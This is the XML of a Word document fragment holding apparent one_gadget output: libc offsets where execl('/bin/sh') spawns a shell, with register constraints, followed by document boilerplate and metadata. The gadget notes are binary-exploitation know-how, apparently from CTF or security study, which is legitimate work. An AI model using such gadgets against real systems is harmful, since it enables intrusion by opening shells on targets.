    <w:p w14:paraId="76F18B36" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve"># 0x1421b3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B769253" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED84FCB" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve">#   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is the GOT address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4B7A1030" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve">#   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> == NULL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CBDB94" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46"/>
    <w:p w14:paraId="3BB383F3" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve"># 0x1421b4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>execl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D9CA2E" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t># constraints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2E3CCC" w14:textId="77777777" w:rsidR="00F15A46" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t xml:space="preserve">#   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is the GOT address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58616FBE" w14:textId="7EDF4223" w:rsidR="00287AEB" w:rsidRPr="00287AEB" w:rsidRDefault="00F15A46" w:rsidP="00F15A46">
      <w:r>
        <w:t>#   [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>] == NULL</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00287AEB" w:rsidRPr="00287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40B96" w14:textId="77777777" w:rsidR="00283647" w:rsidRDefault="00283647" w:rsidP="00CC1018">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="12669EBC" w14:textId="77777777" w:rsidR="00283647" w:rsidRDefault="00283647" w:rsidP="00CC1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9B786" w14:textId="77777777" w:rsidR="00283647" w:rsidRDefault="00283647" w:rsidP="00CC1018">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="03E916D3" w14:textId="77777777" w:rsidR="00283647" w:rsidRDefault="00283647" w:rsidP="00CC10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AA"/>
    <w:rsid w:val="00283647"/>
    <w:rsid w:val="00287AEB"/>
    <w:rsid w:val="004A2B7C"/>
    <w:rsid w:val="00644402"/>
    <w:rsid w:val="006C1BAA"/>
    <w:rsid w:val="00CC1018"/>
    <w:rsid w:val="00D44DF2"/>
    <w:rsid w:val="00E2294C"/>
    <w:rsid w:val="00EC79CA"/>
    <w:rsid w:val="00F1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1083F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{15083A54-CA50-436C-99CC-B2343993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7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7A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1018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7AE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87AEB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7AE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287A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C10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101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1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101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C1018"/>
    <w:rPr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zhuohang Li</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-09T12:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-24T12:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>